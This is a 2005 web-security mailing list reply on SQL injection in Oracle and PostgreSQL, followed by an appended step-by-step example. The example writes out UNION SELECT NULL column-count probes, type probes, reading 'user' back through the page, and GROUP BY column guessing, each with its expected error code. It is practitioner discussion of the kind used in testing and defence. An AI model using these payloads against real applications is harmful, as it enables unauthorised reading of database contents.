WebApp Sec mailing list archives

Re: about oracle sql injection


From: Javier Fernandez-Sanguino <jfernandez () germinus com>
Date: Fri, 02 Dec 2005 09:55:46 +0100

LAROUCHE Francois wrote:

> Hi,
>
>> IMHO, the best you can do is to first use a 'group by' injection to
>> determine the *name* of the parameters in the select query
>
> Well I don't want to be a pain but GROUP BY 0 or by any number
> won't work on either SQL Server or Oracle. (unless you know a way
> I don't. If you do please enlighten me :) )

Oops. You are right, you need to first know a column name to start with. I don't remember now where I used this first but maybe I did try things like 'group by uid' first (blind guessing that 'uid' might be a valid column name). It must just be that the programmers have used the same names for the parameters in the HTTP CGI requests as for the column names in the database.

In some databases (testing PostgreSQL right now) it looks like you can use a 'group by' clause with a column from a *different* table and get valid information from the original table:

$ psql template1
# select * from pg_catalog.pg_am group by information_schema.columns.table_name;
NOTICE:  adding missing FROM-clause entry for table "columns"
ERROR: column "pg_am.amname" must appear in the GROUP BY clause or be used in an aggregate function

Note: 'amname' is the first column of the pg_catalog.pg_am table, information_schema is the system database and 'columns' is one of its tables.

Don't have access to an Oracle database right now to test this out with the system tables and see if it would work out fine. Anyone care to test?

>> Maybe NULLs will pass?
>
> And yes null will work pretty fine, actually the trick is to try
> null until it won't raise an error stating that there is an
> incorrect number of results. Don't forget to add FROM DUAL in your
> union query. If not you will never get any result back on the web
> page in case you want to use only some Oracle variable such as
> "user".

IIRC the 'from DUAL' is only required for Oracle. Are NULLs cast to the valid data types in SQL Server too? I can confirm it works for PostgreSQL.

> Once you have found the right number of columns, you start to
> remove the first null and replace it with a 1 and see what the
> error message is; if there is one, try with '1'. Now it should work.

Notice that there are other datatypes; I've found queries using timestamps, dates and binary datatypes, so you might have more than two data types to test. Integers and strings (varchars) are the most common though.

Regards

Javier
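The probing sequence the two posters describe, written out end to end as an added example (it is not from either message in the thread). It assumes a hypothetical vulnerable query, SELECT id, name, created FROM items WHERE name = '<input>', running on Oracle with columns of type NUMBER, VARCHAR2 and DATE; the table and column names are invented for illustration. Each line is the value injected into <input>, and the comments give the Oracle error code each step produces.

```sql
-- Added example, not from the original thread. Assumed (hypothetical) target:
--   SELECT id, name, created FROM items WHERE name = '<input>'
-- on Oracle, columns NUMBER, VARCHAR2, DATE. Each line below is the injected
-- value: the leading quote closes the application's string literal and the
-- trailing -- comments out whatever the application appends.

-- 1. Column count: add NULLs until the UNION is accepted. NULL is compatible
--    with every column type, so only the count can fail at this stage.
--    Oracle needs FROM DUAL; PostgreSQL and SQL Server accept a bare SELECT.
' UNION SELECT NULL FROM DUAL--              -- ORA-01789: query block has incorrect number of result columns
' UNION SELECT NULL,NULL FROM DUAL--         -- ORA-01789 again
' UNION SELECT NULL,NULL,NULL FROM DUAL--    -- accepted: the query has three columns

-- 2. Types: swap one NULL at a time for 1, then '1', leaving the others NULL
--    so that only the column under test can cause the error.
' UNION SELECT 1,NULL,NULL FROM DUAL--       -- accepted: column 1 is numeric
' UNION SELECT NULL,1,NULL FROM DUAL--       -- ORA-01790: expression must have same datatype as corresponding expression
' UNION SELECT NULL,'1',NULL FROM DUAL--     -- accepted: column 2 is a string
' UNION SELECT NULL,NULL,1 FROM DUAL--       -- ORA-01790
' UNION SELECT NULL,NULL,'1' FROM DUAL--     -- ORA-01790: neither number nor string (the "other datatypes" case)
' UNION SELECT NULL,NULL,SYSDATE FROM DUAL-- -- accepted: column 3 is a DATE

-- 3. Read something back through a column whose type is now known.
' UNION SELECT NULL,user,NULL FROM DUAL--    -- Oracle: current schema name shows up on the page
' UNION SELECT NULL,current_user,NULL--      -- PostgreSQL equivalent, no DUAL needed

-- 4. The GROUP BY guess: a wrong column name dies at parse time, a right one
--    gets further and fails for a different reason, which tells the guesses apart.
' GROUP BY userid--                          -- ORA-00904: invalid identifier (wrong guess)
' GROUP BY name--                            -- ORA-00979: not a GROUP BY expression (right guess)
```

Two caveats a practitioner should keep in mind. First, Oracle's ORA-00979 does not name the offending column, so the PostgreSQL behaviour in the post above, where the error text reveals "pg_am.amname", is a PostgreSQL nicety and not a general one. Second, the 1 versus '1' type test is ambiguous on PostgreSQL and SQL Server: PostgreSQL treats an unadorned '1' as an untyped literal and coerces it to the other branch's type, and SQL Server's data type precedence converts the varchar to int, so UNION SELECT NULL,'1',NULL passes against an integer column on both. Probe with a value that cannot be converted ('a') or force the type explicitly ('1'::text on PostgreSQL) to get a reliable answer.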

